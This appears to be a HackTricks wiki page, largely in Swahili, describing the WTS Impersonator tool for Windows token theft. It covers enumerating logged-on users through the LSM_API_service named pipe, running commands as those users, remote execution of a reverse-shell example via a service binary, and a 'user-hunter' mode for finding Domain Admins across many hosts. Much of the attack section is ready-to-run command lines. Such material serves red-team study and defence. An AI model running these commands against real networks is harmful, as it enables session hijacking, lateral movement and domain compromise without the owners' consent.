tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Chombo cha WTS Impersonator kinatumia "\pipe\LSM_API_service" RPC Named pipe ili kuhesabu kwa siri watumiaji walioingia na kuchukua token zao, ikiepuka mbinu za jadi za Token Impersonation. Njia hii inarahisisha harakati za upande mmoja ndani ya mitandao. Ubunifu wa mbinu hii unahusishwa na Omri Baso, ambaye kazi yake inapatikana kwenye GitHub.
Msingi wa Kazi
Chombo kinatumika kupitia mfululizo wa API calls:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Key Modules and Usage
-
Enumerating Users: Utekelezaji wa kuorodhesha watumiaji wa ndani na wa mbali unapatikana kwa zana, kwa kutumia amri kwa kila hali:
-
Locally:
.\WTSImpersonator.exe -m enum
- Remotely, by specifying an IP address or hostname:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
-
Executing Commands: Moduli za
exec
naexec-remote
zinahitaji muktadha wa Service ili kufanya kazi. Utekelezaji wa ndani unahitaji tu executable ya WTSImpersonator na amri: -
Mfano wa utekelezaji wa amri za ndani:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe inaweza kutumika kupata muktadha wa huduma:
.\PsExec64.exe -accepteula -s cmd.exe
-
Remote Command Execution: Inahusisha kuunda na kufunga huduma kwa mbali kama PsExec.exe, ikiruhusu utekelezaji kwa ruhusa zinazofaa.
-
Mfano wa utekelezaji wa mbali:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- User Hunting Module: Inalenga watumiaji maalum kwenye mashine nyingi, ikitekeleza msimbo chini ya ithibati zao. Hii ni muhimu sana kwa kulenga Domain Admins wenye haki za admin za ndani kwenye mifumo kadhaa.
- Mfano wa matumizi:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.